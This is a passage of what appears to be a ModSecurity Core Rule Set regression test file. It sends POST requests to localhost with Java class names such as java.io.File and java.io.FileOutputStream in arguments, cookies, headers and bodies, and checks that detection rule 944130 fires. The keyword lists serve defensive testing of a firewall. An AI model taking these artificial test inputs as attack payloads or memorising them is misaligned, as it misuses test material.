input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.ByteArrayOutputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-63 - desc: "Content-Type text/plain includes keyword java.io.ByteArrayOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.ByteArrayOutputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-64 - desc: "Content-Type application/json arg value includes keyword java.io.ByteArrayOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.ByteArrayOutputStream\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-65 - desc: "Content-Type application/json arg name includes keyword java.io.ByteArrayOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.io.ByteArrayOutputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-66 - desc: "Argument test includes keyword java.io.CharArrayReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.CharArrayReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-67 - desc: "Argument name includes keyword java.io.CharArrayReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.io.CharArrayReader=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-68 - desc: "Cookie test includes keyword java.io.CharArrayReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.CharArrayReader - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-69 - desc: "Cookie name includes keyword java.io.CharArrayReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.CharArrayReader=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-70 - desc: "Request header test includes keyword java.io.CharArrayReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.CharArrayReader - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-71 - desc: "XML attribute value includes keyword java.io.CharArrayReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-72 - desc: "XML element value includes keyword java.io.CharArrayReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.CharArrayReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-73 - desc: "Nested XML element value includes keyword java.io.CharArrayReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.CharArrayReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-74 - desc: "Content-Type text/plain includes keyword java.io.CharArrayReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.CharArrayReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-75 - desc: "Content-Type application/json arg value includes keyword java.io.CharArrayReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.CharArrayReader\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-76 - desc: "Content-Type application/json arg name includes keyword java.io.CharArrayReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.io.CharArrayReader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-77 - desc: "Argument test includes keyword java.io.DataInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.DataInputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-78 - desc: "Argument name includes keyword java.io.DataInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.io.DataInputStream=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-79 - desc: "Cookie test includes keyword java.io.DataInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.DataInputStream - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-80 - desc: "Cookie name includes keyword java.io.DataInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.DataInputStream=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-81 - desc: "Request header test includes keyword java.io.DataInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.DataInputStream - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-82 - desc: "XML attribute value includes keyword java.io.DataInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-83 - desc: "XML element value includes keyword java.io.DataInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.DataInputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-84 - desc: "Nested XML element value includes keyword java.io.DataInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.DataInputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-85 - desc: "Content-Type text/plain includes keyword java.io.DataInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.DataInputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-86 - desc: "Content-Type application/json arg value includes keyword java.io.DataInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.DataInputStream\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-87 - desc: "Content-Type application/json arg name includes keyword java.io.DataInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.io.DataInputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-88 - desc: "Argument test includes keyword java.io.File" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.File" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-89 - desc: "Argument name includes keyword java.io.File" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.io.File=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-90 - desc: "Cookie test includes keyword java.io.File" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.File - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-91 - desc: "Cookie name includes keyword java.io.File" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.File=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-92 - desc: "Request header test includes keyword java.io.File" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.File - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-93 - desc: "XML attribute value includes keyword java.io.File" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-94 - desc: "XML element value includes keyword java.io.File" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.File" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-95 - desc: "Nested XML element value includes keyword java.io.File" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.File" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-96 - desc: "Content-Type text/plain includes keyword java.io.File" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.File" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-97 - desc: "Content-Type application/json arg value includes keyword java.io.File" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.File\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-98 - desc: "Content-Type application/json arg name includes keyword java.io.File" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.io.File\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-99 - desc: "Argument test includes keyword java.io.FileOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.FileOutputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-100 - desc: "Argument name includes keyword java.io.FileOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.io.FileOutputStream=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-101 - desc: "Cookie test includes keyword java.io.FileOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.FileOutputStream - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-102 - desc: "Cookie name includes keyword java.io.FileOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.FileOutputStream=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-103 - desc: "Request header test includes keyword java.io.FileOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.FileOutputStream - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-104 - desc: "XML attribute value includes keyword java.io.FileOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-105 - desc: "XML element value includes keyword java.io.FileOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.FileOutputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-106 - desc: "Nested XML element value includes keyword java.io.FileOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.FileOutputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-107 - desc: "Content-Type text/plain includes keyword java.io.FileOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.FileOutputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-108 - desc: "Content-Type application/json arg value includes keyword java.io.FileOutputStream" - stages: - - - stage: - input: - dest_addr: 